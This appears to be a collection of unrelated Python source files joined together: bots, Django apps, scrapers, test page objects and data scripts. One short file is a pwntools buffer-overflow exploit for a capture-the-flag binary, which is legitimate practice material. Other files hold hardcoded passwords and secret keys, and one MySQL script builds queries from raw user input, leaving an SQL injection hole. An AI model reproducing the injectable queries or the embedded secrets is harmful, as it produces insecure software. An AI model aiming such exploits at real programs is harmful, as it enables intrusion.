return discord.utils.find(lambda channel: channel.name == channel_name, self.main_server.channels)
def is_member_subscriber(self, member):
for role in member.roles:
if role.id == self.sub_role.id:
return True
return False
def get_member(self, user_id):
return discord.utils.find(lambda m: m.id == user_id, self.main_server.members)
async def on_message(self, message):
log.info('{0}: {1}'.format(message.author.name, message.content))
channel_id = message.channel.id if message.channel.is_private is False else 'private'
# channel = message.channel
chan = self.channels.get(channel_id, None)
if chan is None:
chan = self.channels.get('any', None)
if chan:
commands = chan.get('commands', {})
delete_commands = chan.get('delete_commands', False)
command = commands.get(message.content, None)
if command is not None:
cmd = command(message)
asyncio.ensure_future(cmd)
if delete_commands:
await self.delete_message(message)
return True
is_moderator = False
try:
for role in message.author.roles:
if role in self.moderator_roles:
is_moderator = True
break
except:
pass
if is_moderator is False:
return False
if message.content.startswith('!ping'):
await self.send_message(message.channel, 'Pong!')
elif message.content.startswith('!next'):
await self.command_aidsfest_next(message)
elif message.content.startswith('!chaninfo'):
await self.send_message(message.channel, 'Current channel:\n**Name:** {0.name}\n**ID:** {0.id}'.format(message.channel))
elif message.content.startswith('!clearchat'):
correct_channel = discord.utils.find(lambda c: c.name == 'announcements', self.main_server.channels)
if correct_channel:
keep_first_message = True
async for message in self.logs_from(correct_channel, limit=1000):
if keep_first_message:
keep_first_message = False
continue
await self.delete_message(message)
elif message.content.startswith('!myroles'):
roles_str = '\n'.join(['{0.name} - {0.id}'.format(role) for role in message.author.roles[1:]])
await self.send_message(message.channel, 'You are part of the following roles:\n{0}'.format(roles_str))
elif message.content.startswith('!serverroles'):
roles_str = '\n'.join(['**{0.name}** - ID: **{0.id}**'.format(role) for role in self.main_server.roles[1:]])
await self.send_message(message.channel, 'Roles on the server:\n{0}'.format(roles_str))
elif message.content.startswith('!quit'):
await self.send_message(message.channel, 'Quitting.. Good bye!')
await self.quit()
elif message.content.startswith('!info'):
await self.send_message(message.channel, 'Your user ID is: **{0}**'.format(message.author.id))
async def on_ready(self):
print('Logged in as {0} (@{1})'.format(self.user.name, self.user.id))
game = discord.Game()
game.name = "BabyRage simulator"
asyncio.ensure_future(self.change_status(game=game, idle=False))
for server in self.servers:
log.info(server)
self.main_server = self.get_server(self.server_name)
self.sub_role = self.get_role(self.sub_role_name)
self.current_speaker_role = self.get_role(self.current_speaker_role_name)
self.moderator_roles = [self.get_role(role_name) for role_name in self.moderator_role_names]
self.aidsfest_text_channel = self.get_text_channel(self.aidsfest_text_channel_name)
log.info(self.aidsfest_text_channel)
log.info(self.aidsfest_text_channel.id)
log.info(type(self.aidsfest_text_channel.id))
self.channels = {
self.aidsfest_text_channel.id: {
'no_chatting': True,
'commands': {
'!join': self.command_aidsfest_join_queue,
'!list': self.command_aidsfest_list,
'!unmuteall': self.command_unmute_all,
}
},
'private': {
'commands': {
'!join': self.command_aidsfest_join_queue,
}
},
'any': {
'commands': {
'!join': self.command_aidsfest_join_queue,
}
},
}
self.aidsfest_timer = TimerClass(self)
self.aidsfest_timer.start()
self.aidsfest_timer.stop()
async def get_invitation(self, username, user_id=0):
print('getting invitation for {0}'.format(username))
invite = await self.create_invite(self.main_server)
# invite = self.create_invite(self.main_server, max_age=10)
if invite:
return invite.url
def load_queue(self):
try:
with open(self.queue_path, 'r') as file:
self.aidsfest_queue = json.load(file)
except FileNotFoundError:
self.aidsfest_queue = []
pass
def save_queue(self):
with open(self.queue_path, 'w+') as file:
json.dump(self.aidsfest_queue, file, ensure_ascii=False)
async def aidsfest_next_in_line(self):
# Remove any "current speaker"
for member in self.main_server.members:
for role in member.roles:
if role == self.current_speaker_role:
log.info('Removing {} from the current speaker role'.format(member.name))
await self.remove_roles(member, [self.current_speaker_role])
await self.server_voice_state(member, mute=True)
if len(self.aidsfest_queue) > 0:
user_id = self.aidsfest_queue.pop(0)
member = self.get_member(user_id)
if member:
await self.add_roles(member, [self.current_speaker_role])
await self.server_voice_state(member, mute=False)
await self.send_message(self.aidsfest_text_channel, '{0}, you can now talk in the aidsfest channel.'.format(member.mention))
try:
if len(self.aidsfest_queue) > 0:
qsize = len(self.aidsfest_queue)
next_ppl = self.aidsfest_queue[:3]
next_ppl_str = ', '.join(['**{0}**'.format(self.get_member(u).name) for u in next_ppl])
await self.send_message(self.aidsfest_text_channel, 'There are currently **{0}** people in the queue. Next **{1}** in line are: {2}'.format(qsize, len(next_ppl), next_ppl_str))
except:
pass
self.save_queue()
async def command_aidsfest_join_queue(self, message):
if message.channel.is_private:
member = self.get_member(message.author.id)
if member is None:
return False
else:
member = message.author
if self.is_member_subscriber(member) is False:
return False
if message.author.id in self.aidsfest_queue:
await self.send_message(message.channel, '{0}, you are already in the aidsfest queue at position {1}.'.format(message.author.mention, self.aidsfest_queue.index(message.author.id) + 1))
else:
await self.send_message(message.channel, '{0}, you have been placed in the aidsfest queue.'.format(message.author.mention))
self.aidsfest_queue.append(message.author.id)
self.save_queue()
async def command_aidsfest_next(self, message=None):
self.aidsfest_timer.stop()
async def command_aidsfest_list(self, message=None):
if len(self.aidsfest_queue) > 0:
qsize = len(self.aidsfest_queue)
next_ppl = self.aidsfest_queue[:3]
next_ppl_str = ', '.join(['**{0}**'.format(self.get_member(u).name) for u in next_ppl])
await self.send_message(self.aidsfest_text_channel, 'There are currently **{0}** people in the queue. Next **{1}** in line are: {2}'.format(qsize, len(next_ppl), next_ppl_str))
else:
await self.send_message(self.aidsfest_text_channel, 'No one is queued up for aidsfest.')
async def command_unmute_all(self, message):
for member in self.main_server.members:
if member.mute and not member.status == 'offline':
log.info(member.status)
await self.send_message(message.channel, 'Unmuting {}'.format(member.name))
await self.server_voice_state(member, mute=False)
await asyncio.sleep(5)
def run_discord_client():
from config import DiscordConfig
client = DiscordBot()
try:
client.run(DiscordConfig.EMAIL, DiscordConfig.PASSWORD)
except KeyboardInterrupt:
client.quit()
except:
log.exception('BabyRage BabyRage')
if __name__ == '__main__':
run_discord_client()
|
from django.db import models
from taggit.managers import TaggableManager
from nomadgram.users import models as user_models
#if we import many models we make nickname using 'as~'
# Create your models here.
class TimeStampedModel(models.Model):
created_at = models.DateField(auto_now_add=True)
updated_at = models.DateField(auto_now=True)
class Meta:
abstract=True
class Image(TimeStampedModel):
""" Image Model """
file = models.ImageField()
creator = models.ForeignKey(user_models.User, null=True,on_delete=models.CASCADE, related_name='images')
location = models.CharField(max_length=140)
caption = models.TextField()
tags=TaggableManager()
@property
def like_count(self):
return self.likes.all().count()
@property
def comment_count(self):
return self.comments.all().count()
def __str__(self):
return '{} - {}'.format(self.location, self.caption)
class Comment(TimeStampedModel):
""" Comment Model """
message= models.TextField()
creator = models.ForeignKey(user_models.User, null=True, on_delete=models.CASCADE,related_name='comments')
image =models.ForeignKey(Image, on_delete=models.CASCADE, null=True, related_name='comments')
def __str__(self):
return 'Image Caption: {}- User: {} - Comment: {} '.format( self.image.caption, self.creator.username, self.message)
class Like(TimeStampedModel):
""" Like Model """
creator = models.ForeignKey(user_models.User, null=True,on_delete=models.CASCADE, related_name='likes')
image =models.ForeignKey(Image, on_delete=models.CASCADE, null=True, related_name='likes')
def __str__(self):
return 'User: {} - Image Caption: {}'.format(self.creator.username, self.image.caption) |
from lib.chatbot.reaction.reactionBase import ReactionBase
class ReactionDefault(ReactionBase):
def __init__(self, message, me):
super().__init__(message, me)
def response(self):
text = "Uff, I'm speechless..."
self._send_message(text)
def action(self):
pass
|
import mysql.connector
try:
host_name = "localhost"
user_name = "root"
pwd = "9866850403"
db_name = ""
con = mysql.connector.connect(host=host_name, user=user_name, password=pwd, database=db_name)
cur = con.cursor()
sql = "show databases"
cur.execute(sql)
existing_dbs = cur.fetchall()
print("Existing databases are as follows: ")
for row in existing_dbs:
print(row[0])
print()
db_name = (input("Enter a database name from the list to fetch tables: ")).lower()
sql2 = ("use {}".format(db_name))
cur.execute(sql2)
print("'{}' database selected".format(db_name))
sql3 = "show tables"
cur.execute(sql3)
table_list = cur.fetchall()
print("Tables list in the database that you've selected '{}' are as follows:".format(db_name))
for row in table_list:
print(row[0])
print()
get_table_proprties = input("Enter a table name to get properties: ").lower()
sql4 = ("describe {}".format(get_table_proprties))
cur.execute(sql4)
get_table_proprties_op = cur.fetchall()
for row in get_table_proprties_op:
print(row[0], row[1], row[2])
print()
table_name = input("Enter a table name to get details: ").lower()
sql5 = ("select * from {}".format(table_name))
cur.execute(sql5)
table_data = cur.fetchall()
for row in table_data:
print("%5s %30s %15s %15s" % (row[0], row[1], row[2], row[3]))
except mysql.connector.Error as err:
print(err)
else:
cur.close()
con.close()
|
#/bin/python
from pyb import *
from time import sleep
x = 0
brightness = 100
led1 = LED(1)
led2 = LED(2)
brightness = 0
while True:
for count in range(50):
led1.intensity(brightness)
brightness += 1
sleep(0.05)
for count in range(50):
led1.intensity(brightness)
brightness += -1
sleep(0.05)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.listar_publicaciones),
url(r'^post/(?P<pk>[0-9]+)/$', views.detalle_publicacion),
url(r'^post/new/$', views.nueva_publicacion, name='nueva_publicacion'),
url(r'^post/(?P<pk>[0-9]+)/edit/$', views.post_editar, name='post_editar'),
]
|
import discord
from discord.ext import commands
import json
import os
from classes import Guild
import database as db
from env import TOKEN
from vars import bot, extensions, get_prefix
@bot.event
async def on_ready():
"""Initial function to run when the bot is ready to function"""
await bot.change_presence(
activity=discord.Activity(type=discord.ActivityType.playing,
name="@Pandora's Bot for help"))
print("Generating Objects...")
# collect new guild ids and create objects for them
new_ids = {guild.id for guild in bot.guilds} - set(Guild._guilds.keys())
# Create new Guild objects
new_guilds = [Guild(id) for id in new_ids]
print("Updating database...")
db.update(*new_guilds)
print("Ready Player One.")
@bot.event
async def on_message(message):
"""Message listener."""
# make sure it doesnt run when bot writes message
if message.author == bot.user:
return
await bot.process_commands(message) # checks if message is command
@bot.event
async def on_guild_join(guild):
"""Bot joined a new server"""
guild = Guild(guild.id)
db.update(guild)
@bot.event
async def on_guild_remove(guild):
"""Bot was removed from a server"""
Guild.pop(guild.id, None)
# remove from DB
db.delete_guild(guild.id)
# loads extensions(cogs) listed in vars.py
if __name__ == '__main__':
for extension in extensions:
try:
bot.load_extension(extension)
except Exception as e:
print(f"Couldn't load {extension}")
print(e)
bot.run(TOKEN) # runs the bot
|
#!/usr/bin/python3
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
PATH = "https://raw.githubusercontent.com/hyeonukbhin/homework3_NA/master/assets/data/"
FILENAME = "647_Global_Temperature_Data_File.txt"
TITLE = "Global Temperature"
X_LABEL = "YEAR"
Y_LABEL = "Temperature Anomaly (C)"
SAVE_FILENAME = "assets/images/global_warming.png"
coll_name = ["Year", "1-year Mean", "5-year Mean"]
df = pd.read_csv(PATH + FILENAME, delimiter="\s+", header=None)
df.columns = coll_name
x = df[coll_name[0]]
y1 = df[coll_name[1]]
y2 = df[coll_name[2]]
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(8, 5))
ax.plot(x, y1, c="blue", ls="-.", marker="o", ms="4", mec="blue", mfc="white", label=coll_name[1])
ax.plot(x, y2, c="black", ls="-", lw="5", label=coll_name[2])
plt.xticks(np.arange(1880, 2030, 10))
plt.yticks(np.arange(-0.5, 1.5, 0.5))
ax.legend()
ax.set_title(TITLE, fontsize=20)
ax.set_xlabel(X_LABEL, fontsize=14)
ax.set_ylabel(Y_LABEL, fontsize=14)
ax.grid(c="gray", ls="-", lw=2)
fig.savefig(SAVE_FILENAME)
plt.show()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 15:27:04 2016
@author: alex
"""
from AlexRobotics.dynamic import Prototypes as Proto
from AlexRobotics.control import RolloutComputedTorque as RollCTC
import numpy as np
R_ctl = Proto.SingleRevoluteDSDM()
R = Proto.SingleRevoluteDSDM()
# Load mass
R.M = 0.2
R_ctl.M = 0.3
R_ctl.ext_cst_force = 0
# Assign controller
Ctl = RollCTC.RolloutSlidingModeController( R_ctl )
R.ctl = Ctl.ctl
Ctl.n_gears = 2
Ctl.w0 = 1.0
Ctl.lam = 1.0
Ctl.nab = 1.0
Ctl.D = 2
Ctl.hysteresis = True
Ctl.min_delay = 0.5
Ctl.goal = np.array([0,0])
Ctl.FixCtl.lam = Ctl.lam
Ctl.FixCtl.nab = Ctl.nab
Ctl.FixCtl.D = Ctl.D
Ctl.horizon = 0.5
Ctl.domain_check = False
# Max torque
R_ctl.u_ub = np.array([+10,500])
R_ctl.u_lb = np.array([-10,0])
""" Simulation and plotting """
# Ploting a trajectory
x_start = np.array([-6,0])
tf = 10
dt = 0.01
n = int( tf / dt ) + 1
R.computeSim( x_start , tf , n , solver = 'euler' )
R.animateSim()
R.Sim.plot_CL()
#
#Disturbances_Bounds = np.array([0,1,5,10])
#
#
#for D in Disturbances_Bounds:
#
# Ctl.FixCtl.D = D
#
# Ctl.reset_hysteresis()
#
# R.computeSim( x_start , tf , n , solver = 'euler' )
#
# R.Sim.plot_CL()
#
# R.Sim.fig.canvas.set_window_title('D = ' + str(D) )
# R.Sim.plots[3].set_ylim( 0 , 15 )
# R.Sim.plots[3].set_yticks( [ 1 , 10 ] )
#
|
import os
import random
import string
import wave
import logging
from handlers.base import BaseHandler
from recognizer import speech
logger = logging.getLogger(__name__)
def get_path(filename):
from settings import UPLOAD_ROOT
return os.path.join(UPLOAD_ROOT, filename)
class UploadHandler(BaseHandler):
def post(self):
file1 = self.request.files['file1'][0]
original_fname = file1['filename']
extension = os.path.splitext(original_fname)[1]
chars = string.ascii_lowercase + string.digits
fname = ''.join(random.choice(chars) for x in range(6)) + extension
file_path = get_path(fname)
with open(file_path, 'wb') as f:
f.write(file1['body'])
with wave.open(file_path, 'r') as w:
logger.info("***** WAV INFO *****")
logger.info(w.getparams())
transcript = speech.listen(file_path)
self.finish(transcript)
|
import os
from setuptools import setup, find_packages
version = '0.0.1'
README = os.path.join(os.path.dirname(__file__), 'README.rst')
long_description = open(README).read() + '\n\n'
if __name__ == '__main__':
setup(
name='todo',
version=version,
description=(''),
long_description=long_description,
author='David Zuwenden',
author_email='dhain@zognot.org',
url='https://github.com/dhain/potpy',
license='MIT',
classifiers=[
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
],
packages=find_packages(),
test_suite='todo.test',
tests_require=['mock', 'wsgi_intercept', 'pastedeploy'],
install_requires=['potpy', 'webob'],
entry_points={
'paste.app_factory': [
'main=todo.app_factory:factory',
],
}
)
|
# +------------------------------------------------+
# | Atack: Bof Win Function |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/05-bof_callfunction
from pwn import *
import sf
target = process("./chall-test_utc-pwn2")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x3c)
bof_payload.set_ret(0x8049256)
payload = bof_payload.generate_payload()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Slipknot |
# +------------------------------------------------+
# | Song: Duality |
# +------------------------------------------------+
# | I push my fingers into my |
# +------------------------------------------------+
|
"""
prometheus.py
A simple python script that pulls data from Prometheus's API, and
stores it in a Deephaven table.
This is expected to be run within Deephaven's application mode https://deephaven.io/core/docs/how-to-guides/app-mode/.
After launching, there will be 2 tables within the "Panels" section of the Deephaven UI.
One will be a static table and the other will be continually updating with real data.
@author Jake Mulford
@copyright Deephaven Data Labs LLC
"""
from deephaven.TableTools import newTable, stringCol, dateTimeCol, doubleCol
from deephaven import DynamicTableWriter
from deephaven.DBTimeUtils import millisToTime
import deephaven.Types as dht
from typing import Callable
import requests
import threading
import time
PROMETHEUS_QUERIES = ["up", "go_memstats_alloc_bytes"] #Edit this and add your queries here
BASE_URL = "{base}/api/v1/query".format(base="http://prometheus:9090") #Edit this to your base URL if you're not using a local Prometheus instance
ApplicationState = jpy.get_type("io.deephaven.appmode.ApplicationState")
def make_prometheus_request(prometheus_query, query_url):
"""
A helper method that makes a request on the Prometheus API with the given
query, and returns a list of results containing the timestamp, job, instance, and value for the query.
The data returned by this method will be stored in a Deephaven table.
This assumes that the query is going to return a "vector" type from the Prometheus API.
https://prometheus.io/docs/prometheus/latest/querying/api/#instant-vectors
Args:
prometheus_query (str): The Prometheus query to execute with the API request.
query_url (str): The URL of the query endpoint.
Returns:
list[(date-time, str, str, float)]: List of the timestamps, jobs, instances, and values from the API response.
"""
results = []
query_parameters = {
"query": prometheus_query
}
response = requests.get(query_url, params=query_parameters)
response_json = response.json()
if "data" in response_json.keys():
if "resultType" in response_json["data"] and response_json["data"]["resultType"] == "vector":
for result in response_json["data"]["result"]:
#Prometheus timestamps are in seconds. We multiply by 1000 to convert it to
#milliseconds, then cast to an int() to use the millisToTime() method
timestamp = millisToTime(int(result["value"][0] * 1000))
job = result["metric"]["job"]
instance = result["metric"]["instance"]
value = float(result["value"][1])
results.append((timestamp, job, instance, value))
return results
def start_dynamic(app: ApplicationState):
"""
Deephaven Application Mode method that starts the dynamic data collector.
"""
column_names = ["DateTime", "PrometheusQuery", "Job", "Instance", "Value"]
column_types = [dht.datetime, dht.string, dht.string, dht.string, dht.double]
table_writer = DynamicTableWriter(
column_names,
column_types
)
result = table_writer.getTable()
def thread_func():
while True:
for prometheus_query in PROMETHEUS_QUERIES:
values = make_prometheus_request(prometheus_query, BASE_URL)
for (date_time, job, instance, value) in values:
table_writer.logRow(date_time, prometheus_query, job, instance, value)
time.sleep(2)
app.setField("result_dynamic", result)
thread = threading.Thread(target = thread_func)
thread.start()
def start_static(app: ApplicationState, query_count=5):
"""
Deephaven Application Mode method that starts the static data collector.
query_count sets the number of requests to make. It is recommended to keep this number low,
since it delays how long the Deephaven UI takes to become accessible.
"""
date_time_list = []
prometheus_query_list = []
job_list = []
instance_list = []
value_list = []
for i in range(query_count):
for prometheus_query in PROMETHEUS_QUERIES:
values = make_prometheus_request(prometheus_query, BASE_URL)
for (date_time, job, instance, value) in values:
date_time_list.append(date_time)
prometheus_query_list.append(prometheus_query)
job_list.append(job)
instance_list.append(instance)
value_list.append(value)
time.sleep(2)
result = newTable(
dateTimeCol("DateTime", date_time_list),
stringCol("PrometheusQuery", prometheus_query_list),
stringCol("Job", job_list),
stringCol("Instance", instance_list),
doubleCol("Value", value_list)
)
app.setField("result_static", result)
def update(app: ApplicationState):
"""
Deephaven Application Mode method that does various updates on the initial tables.
You can throw any Deehaven Query in here. The ones in here are simply examples.
"""
#Get the tables from the app
result_static = app.getField("result_static").value()
result_dynamic = app.getField("result_dynamic").value()
#Perform the desired queries, and set the results as new fields
result_static_update = result_static.by("PrometheusQuery")
app.setField("result_static_update", result_static_update)
result_static_average = result_static.dropColumns("DateTime", "Job", "Instance").avgBy("PrometheusQuery")
app.setField("result_static_average", result_static_average)
result_dynamic_update = result_dynamic.by("PrometheusQuery")
app.setField("result_dynamic_update", result_dynamic_update)
result_dynamic_average = result_dynamic.dropColumns("DateTime", "Job", "Instance").avgBy("PrometheusQuery")
app.setField("result_dynamic_average", result_dynamic_average)
def initialize(func: Callable[[ApplicationState], None]):
"""
Deephaven Application Mode initialization method.
"""
app = jpy.get_type("io.deephaven.appmode.ApplicationContext").get()
func(app)
#Start the static and dynamic data collectors
initialize(start_static)
initialize(start_dynamic)
#Run the table updates
initialize(update)
|
from rest_framework import viewsets
from rest_framework.response import Response
from ..serializers import TrailSectionsSerializer
from trail_mapper.models import TrailSections, Trail
class TrailSectionsViewSet(viewsets.ModelViewSet):
"""This is the m2m join of trails and trail_sections."""
queryset = TrailSections.objects.all()
serializer_class = TrailSectionsSerializer
lookup_field = 'guid'
def list(self, request, *args, **kwargs):
#recreate the queryset here so it has all data
sections_queryset = TrailSections.objects.all()
trail_queryset = Trail.objects.all()
trails = []
for trail in trail_queryset:
trail_sections = sections_queryset.filter(trail__guid=trail.guid)
trail_sections_list = []
for trail_section in trail_sections:
trail_sections_list.append(trail_section.trail_section.guid)
trail_dict = {
'trail_guid': trail.guid,
'trail_section_guids': trail_sections_list
}
trails.append(trail_dict)
content = {
"trails_with_sections": trails
}
return Response(content)
|
from pathlib import Path
import os
import argparse
import pandas as pd
DST_DIR = os.environ.get('FREESURFER_DST')
def parse():
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--dir')
return parser.parse_args()
def main():
args = parse()
P = Path(__file__).resolve().parent / args.dir
for csv in P.glob('*.csv'):
df = pd.read_csv(csv.resolve())
for label, subject in zip(df['Group'], df['Subject']):
target = Path(DST_DIR) / label / subject
if not target.exists():
target.mkdir()
if __name__ == '__main__':
main()
|
import django_filters
from django_filters import CharFilter
from cashPayment.models import cashPayment
class CashFilter(django_filters.FilterSet):
Month = CharFilter(field_name='Month', lookup_expr='icontains')
class Meta:
model = cashPayment
fields = ['Year', 'Month'] |
import os
import hvac
from hvac.exceptions import InvalidPath
from requests.exceptions import ConnectionError
from django.conf import settings
from .models import Vault
class VaultClient():
def __init__(self, mount_point=os.environ.get('VAULT_MOUNT_POINT', 'pwdmng/')):
path_prefix = self._path_prefix = mount_point
self._client = client = hvac.Client(url=settings.VAULT_HOST, token=settings.VAULT_TOKEN)
try:
#assert client.is_authenticated() # => True
engines = client.list_secret_backends()
if engines.get(path_prefix) == None:
client.enable_secret_backend('kv', mount_point=path_prefix, options={'version': '1'})
client.kv.default_kv_version = "1"
except ConnectionError as err:
print("VaultClient error: {0}".format(err))
pass
@property
def client(self):
assert self._client.is_authenticated()
return self._client
def delete(self, path):
self.client.kv.delete_secret(mount_point=self._path_prefix, path=path)
def write(self, path, **kargs):
self.client.kv.create_or_update_secret(mount_point=self._path_prefix, path=path, secret=kargs)
#self.client.write(self._path_prefix + path, **kargs)
def read(self, path):
data = None
try:
data = self.client.kv.read_secret(mount_point=self._path_prefix, path=path)
except InvalidPath:
pass
return data
def wrap(self, data):
response = self._client.adapter.post('/v1/sys/wrapping/wrap', json=data, headers={'X-Vault-Wrap-TTL': '30m'})
return response.json()
def unwrap(self, token):
response = self._client.adapter.post('/v1/sys/wrapping/unwrap', json={'token': token})
return response.json()
def get_vault_or_create(self, user):
vaults = Vault.objects.filter(owner=user)
vault = vaults[0] if vaults else Vault.objects.create(owner=user)
return vault |
print('yes')
print('whats')
print('eat gulabjamun')
print('switzerland trip to parents in 2023')
work = input()
if work==1:
print('earn now') |
import scrapy
class DmozSpider(scrapy.Spider):
name = "dmoz"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0",
"Upgrade-Insecure-Requests":"1",
}
allowed_domains = ["sogou.com", "tmall.com"]
start_urls = [
#"https://123.sogou.com/",
"https://www.tmall.com"
]
def start_requests(self):
yield scrapy.Request(
url = self.start_urls[0],
headers = self.headers,
callback = self.parse)
def parse(self, response):
filename = response.url.split("/")[-2] + '.html'
with open(filename, 'wb') as f:
f.write(response.body) |
"""Implementing Report screen page objects"""
from TestFramework.Libraries.Pages.base_page import BasePage
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
class ReportPage(BasePage):
"""
Contains Report UI page locators
Switch to report function
Get Report page title function
Close Report page function
Click administrative reports plus button function
Click account list link function
Click submit button function
Compare account label data function
Set account value function
Click exit button function
Click unp report link function
Set account value function
Set unified number plan type function
Click unp submit button function
Compare number plan on report function
"""
# Start: Report page locators
list_frame_locator = (By.NAME, "List")
detail_frame_locator = (By.NAME, "Detail")
header_frame_locator = (By.NAME, "Header")
administrative_reports_plus_button_locator = (By.ID, "IMGReportTree2_ReportGroup21")
account_list_link_locator = (By.ID, "ReportTree2_ReportGroup21__tlrReport1__Report")
submit_button_locator = (By.ID, "BReport")
account_label_value_locator = (By.ID, "Account")
account_textbox_locator = (By.ID, "rAccount_Account")
exit_button_locator = (By.ID, "C2_mtLogout")
unp_report_link_locator = (By.ID, "ReportTree2_ReportGroup21__tlrReport24__Report")
unp_locator = (By.ID, "rUnifiedNumberPlan_Param5imgDown")
unified_number_plan_type_dropdown_locator = (By.ID, "rIsOpAc_Param9")
unp_report_page_title_locator = (By.ID, "lgx_ReportParameterTitle")
unp_submit_button_locator = (By.ID, "lgxReport")
contract_column_first_value_locator = (By.ID, "cContract_Row1")
# End: Report page locators
def switch_to_report(self):
"""
Implementing switch to report functionality
:return:
"""
self.switch_to_window()
self.accept_ssl_certificate()
def get_report_page_title(self):
"""
Implementing get report page title functionality
:return: Report page title
"""
self.wait().until(EC.presence_of_element_located(self.list_frame_locator), 'list frame not found before specified time')
return self.page_title()
def close_report_page(self):
"""
Implementing close report page functionality
:return:
"""
self.close_browser()
self.switch_to_default_window()
def click_administrative_reports_plus_button(self):
"""
Implementing click administrative reports plus button functionality
:return:
"""
self.switch_to_frame(self.list_frame_locator)
self.click_element(self.administrative_reports_plus_button_locator)
self.switch_to_default_content()
def click_account_list_link(self):
"""
Implementing click account list link functionality
:return:
"""
self.switch_to_frame(self.list_frame_locator)
self.click_element(self.account_list_link_locator)
self.switch_to_default_content()
def click_submit_button(self):
"""
Implementing click submit button functionality
:return:
"""
self.switch_to_frame(self.detail_frame_locator)
self.set_existing_handles()
self.click_element(self.submit_button_locator)
self.switch_to_default_content()
self.switch_to_window()
def compare_account_label_data(self, carrier_name):
"""
Implementing compare account label data functionality
:param carrier_name:
:return: True/False
"""
status = False
account_label_value_element = self.wait().until(EC.presence_of_element_located(self.account_label_value_locator), 'account label value locator not found before specified time out')
account_name = str(account_label_value_element.text)
if carrier_name == account_name:
status = True
return status
def set_account_value(self, account_name):
"""
Implementing set account value functionality
:param account_name:
:return:
"""
self.switch_to_frame(self.detail_frame_locator)
self.set_value_into_input_field(self.account_textbox_locator, account_name)
self.switch_to_default_content()
def click_exit_button(self):
"""
Implementing click exit button functionality
:return:
"""
self.switch_to_frame(self.header_frame_locator)
self.click_element(self.exit_button_locator)
self.switch_to_default_window()
def click_unp_report_link(self):
"""
Implementing click unp report link functionality
:return:
"""
self.switch_to_frame(self.list_frame_locator)
self.click_element(self.unp_report_link_locator)
self.switch_to_default_content()
def set_unified_number_plan(self, account_name, trunk_name, call_type):
"""
Implementing set account value functionality
:param account_name:
:param trunk_name:
:param call_type:
:return:
"""
self.set_existing_handles()
self.switch_to_frame(self.detail_frame_locator)
self.click_element(self.unp_locator)
self.switch_to_default_content()
self.switch_to_window()
template = account_name + "_Out_" + trunk_name + "_" + call_type
template_locator = (By.XPATH, "//div[@id='tLookupPaging']/descendant::table[@id='tLookup']/descendant::span[text()='%s']" % str(template))
self.click_element(template_locator)
self.switch_to_previous_window()
def set_unified_number_plan_type(self, number_plan_type):
"""
Implementing set unified number plan type functionality
:param number_plan_type:
:return:
"""
self.switch_to_frame(self.detail_frame_locator)
self.select_option(self.unified_number_plan_type_dropdown_locator, number_plan_type)
self.click_element(self.unp_report_page_title_locator)
self.switch_to_default_content()
def click_unp_submit_button(self):
"""
Implementing click unp submit button functionality
:return:
"""
self.switch_to_frame(self.detail_frame_locator)
self.set_existing_handles()
self.click_element(self.unp_submit_button_locator)
self.switch_to_default_content()
self.switch_to_window()
def compare_number_plan_on_report(self, contract_name):
"""
Implementing compare number plan on report functionality
:param contract_name:
:return: True/False
"""
status = False
contract_column_first_value_element = self.wait().until(EC.presence_of_element_located(self.contract_column_first_value_locator), 'account label value locator not found before specified time out')
grid_contract_name = str(contract_column_first_value_element.text)
if contract_name == grid_contract_name:
status = True
return status
|
import subprocess
import shlex
import os
import signal
from helper import path_dict, path_number_of_files, pdf_stats, pdf_date_format_to_datetime, dir_size, url_status
import json
from functools import wraps
from urllib.parse import urlparse
from flask import flash, redirect, url_for, Response, send_file, Markup, logging
from flask_mysqldb import MySQL
from wtforms import Form, StringField, IntegerField, PasswordField, validators
from passlib.hash import sha256_crypt
import time
from threading import Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit
from celery import Celery, chord
from requests import post
import tabula
import PyPDF2
import shutil
import requests
# ----------------------------- CONSTANTS -----------------------------------------------------------------------------
# --- TODO has to be changed when deploying ---
VIRTUALENV_PATH = '/home/yann/bar/virtualenv/bin/celery'
PDF_TO_PROCESS = 100
MAX_CRAWLING_DURATION = 60 * 15 # in seconds
WAIT_AFTER_CRAWLING = 1000 # in milliseconds
SMALL_TABLE_LIMIT = 10 # defines what is considered a small table
MEDIUM_TABLE_LIMIT = 20 # defines what is considered a medium table
# Note that when checking for size folders are not taken into account and thus
# the effective size can be up to 10% higher, also leave enough room for other requests,
# like downloading pdf's from stats page. For those reasons I would not recommend
# using more than 50 % of available disk space.
MB_CRAWL_SIZE = 500
MAX_CRAWL_SIZE = 1024 * 1024 * MB_CRAWL_SIZE # in bytes (500MB)
CRAWL_REPETITION_WARNING_TIME = 7 # in days
MAX_CRAWL_DEPTH = 5
DEFAULT_CRAWL_URL = 'https://www.bit.admin.ch'
WGET_DATA_PATH = 'data'
BAR_OUT_LOG_PATH = 'log/bar.out.log'
BAR_ERR_LOG_PATH = 'log/bar.err.log'
CELERY_LOG_PATH = 'log/celery.log'
REDIS_LOG_PATH = 'log/redis.log'
FLOWER_LOG_PATH = 'log/flower.log'
WGET_LOG_PATH = 'log/wget.txt'
switcher = {
'bar.out.log': BAR_OUT_LOG_PATH,
'bar.err.log': BAR_ERR_LOG_PATH,
'celery.log': CELERY_LOG_PATH,
'redis.log': REDIS_LOG_PATH,
'flower.log': FLOWER_LOG_PATH,
'wget.log': WGET_LOG_PATH,
}
# ----------------------------- APP CONFIG ----------------------------------------------------------------------------
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on installed packages.
async_mode = None
app = Flask(__name__)
#app.debug = True
app.secret_key = 'Aj"$7PE#>3AC6W]`STXYLz*[G\gQWA'
